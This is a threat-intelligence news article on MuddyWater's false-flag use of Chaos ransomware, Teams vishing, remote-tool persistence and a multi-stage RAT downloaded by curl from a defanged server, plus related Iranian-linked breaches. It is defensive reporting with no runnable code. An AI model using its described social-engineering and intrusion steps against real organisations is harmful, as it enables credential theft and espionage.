The Iranian state-sponsored hacking group known as MuddyWater (also called Mango Sandstorm, Seedworm, and Static Kitten) has been linked to a ransomware attack that appears to be a deliberate “false flag” operation designed to mislead investigators.
According to a report from Rapid7, the attack — observed in early 2026 — relied on social engineering tactics through Microsoft Teams to begin the infection process. While the incident initially seemed to match the profile of a ransomware-as-a-service (RaaS) group operating under the Chaos brand, deeper analysis revealed it was actually a targeted, state-backed operation disguised as a financially motivated extortion scheme.
“The campaign featured an intensive social engineering phase carried out over Microsoft Teams, where the attackers used interactive screen-sharing sessions to steal credentials and bypass multi-factor authentication (MFA),” Rapid7 explained in a report shared with The Hacker News.
“After gaining access, the group skipped the typical ransomware playbook — instead of encrypting files, they focused on stealing data and maintaining long-term access using remote management tools such as DWAgent.”
The evidence suggests that MuddyWater is increasingly turning to widely available off-the-shelf tools from the cybercrime underground to muddy attribution efforts. This evolving tactic has also been noted by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC in recent months, all of which have documented the group’s use of tools like CastleRAT and Tsundere.
That said, this is far from MuddyWater’s first foray into ransomware. In September 2020, the group was tied to a campaign targeting high-profile Israeli organizations using a loader named PowGoop, which deployed a destructive variant of Thanos ransomware. Then, in 2023, Microsoft revealed that the group partnered with another threat actor known as DEV-1084 — which operates under the DarkBit persona — to carry out destructive attacks disguised as ransomware operations. As recently as October 2025, the attackers are believed to have deployed the Qilin ransomware against an Israeli government hospital.
“In this case, the emerging picture was that the attackers were likely Iranian-affiliated operators working through the cybercriminal ecosystem, using a criminal ransomware brand and methods associated with the broader extortion market, while serving a strategic Iranian objective,” Check Point noted back in March.
“The use of Qilin, and participation in its affiliate program, likely serves not only as a layer of cover and plausible deniability, but also as a meaningful operational enabler, especially as earlier attacks appear to have heightened security measures and monitoring by Israeli authorities.”
Chaos is a RaaS group that surfaced in early 2025. Known for its double extortion approach, the group has promoted its affiliate program on cybercrime forums such as RAMP and RehubCom.
Attacks carried out by this cybercriminal gang combine email flooding and vishing (voice phishing) through Microsoft Teams — often by impersonating IT support staff — to trick victims into installing remote access tools like Microsoft Quick Assist. The attackers then exploit that initial foothold to dig deeper into the victim’s network and deploy ransomware.
“The group has also demonstrated triple extortion by threatening distributed denial-of-service (DDoS) attacks against the victim’s infrastructure,” Rapid7 said. “These capabilities are reportedly offered to affiliates as part of bundled services, representing a notable feature of its RaaS model. Additionally, Chaos has been observed leveraging elements of quadruple extortion, including threats to contact customers or competitors to increase pressure on victims.”
As of late March 2026, Chaos had listed 36 victims on its data leak site, the majority based in the United States. Construction, manufacturing, and business services are among the key sectors the group has targeted.
In the intrusion examined by Rapid7, the threat actor reportedly initiated external chat requests through Microsoft Teams to engage employees and gain initial access via screen-sharing sessions. From there, the attackers used compromised accounts to conduct reconnaissance, establish persistence using tools like DWAgent and AnyDesk, move laterally across the network, and exfiltrate data. The victim was then contacted via email to begin ransom negotiations.
“While connected, the TA [threat actor] ran basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to type their credentials into locally created text files,” Rapid7 explained. “In at least one case, the TA also installed a remote management tool (AnyDesk) to further facilitate access.”
The threat actor was also seen using RDP to download an executable (“ms_upd.exe”) from an external server (“172.86.126[.]208”) via the curl utility. Once executed, the file triggers a multi-stage infection chain that delivers additional malicious components.
A brief overview of the malware families involved is provided below –
- ms_upd.exe (also known as Stagecomp), which gathers system information and contacts a command-and-control (C2) server to retrieve next-stage payloads (game.exe, WebView2Loader.dll, and visualwincomp.txt).
- game.exe (also known as Darkcomp), a custom-built remote access trojan (RAT) disguised as a legitimate Microsoft WebView2 application. It is a trojanized version of the official Microsoft WebView2APISample project.
- WebView2Loader.dll, a legitimate DLL downloaded by ms_upd.exe. It is required by Microsoft Edge WebView2 to embed web content within Windows applications.
- visualwincomp.txt, an encrypted configuration file used by the RAT to obtain C2 server details.
The RAT connects to the C2 server and enters an infinite loop, polling for new commands every 60 seconds. This allows it to execute commands or PowerShell scripts, perform file operations, and launch an interactive cmd.exe shell or PowerShell session.
The campaign’s connection to MuddyWater is supported by the use of a code-signing certificate attributed to “Donald Gay” to sign “ms_upd.exe.” This same certificate has previously been used by the threat group to sign its malware, including a CastleLoader downloader called Fakeset.
These findings highlight the growing overlap between state-sponsored intrusion activity and cybercriminal techniques — a trend aimed at obscuring attribution and slowing down effective defensive responses.
“The use of a RaaS framework in this context may enable the actor to blur the lines between state-sponsored activity and financially motivated cybercrime, making attribution more difficult,” Rapid7 said. “Furthermore,
The addition of extortion and negotiation tactics may help direct defensive teams toward addressing the immediate disruption, potentially causing them to overlook deeper persistence mechanisms put in place through remote access tools like DWAgent or AnyDesk.
Interestingly, even though traces of Chaos ransomware were found, no files were actually encrypted—a notable departure from standard ransomware behavior. This suggests that the ransomware may have been used more as a smokescreen or supporting tool rather than as the main goal of the attack.
This development follows Hunt.io’s disclosure of an Iranian-linked cyber campaign aimed at government entities in Oman, resulting in the theft of over 26,000 user records from the Ministry of Justice, along with judicial case files, committee rulings, and critical SAM and SYSTEM registry hives.
“An exposed directory on IP address 172.86.76[.]127—a virtual private server hosted by RouterHosting in the UAE—revealed an ongoing offensive operation targeting Omani government systems. The attackers left behind their full toolkit, command-and-control code, session logs, and stolen data, all accessible without restriction,” the company reported. “The main focus was the Ministry of Justice and Legal Affairs (mjla.gov[.]om).”
The finding aligns with ongoing cyber activities by pro-Iran hacktivist collectives such as Handala Hack. This group claims to have leaked personal details of nearly 400 U.S. Navy personnel stationed in the Persian Gulf and previously breached the Port of Fujairah in the UAE, gaining access to internal systems and exfiltrating approximately 11,000 sensitive documents—including invoices, shipping manifests, and customs records.
“Just a month ago, we observed a significant surge in Iranian-affiliated cyber operations—ranging from surveillance via compromised cameras to the leak of highly classified documents from Israel’s former military chief, alongside a sharp uptick in regional attack volume. At the time, we warned that further escalation was probable,” said Sergey Shykevich, group manager at Check Point Research, in an interview with The Hacker News.
“If verified, the alleged strike on the Port of Fujairah marks that next phase of escalation. What’s different now is the intent: this isn’t just about espionage or public shaming. Stolen port infrastructure data may have been weaponized to support physical missile targeting,” he added.
“Cyber and kinetic warfare are now directly linked. This campaign shows no signs of slowing. Historically, periods of calm on the ground have preceded intensified cyber offensives—and what we’re witnessing today represents the most dangerous evolution of that cycle yet.”
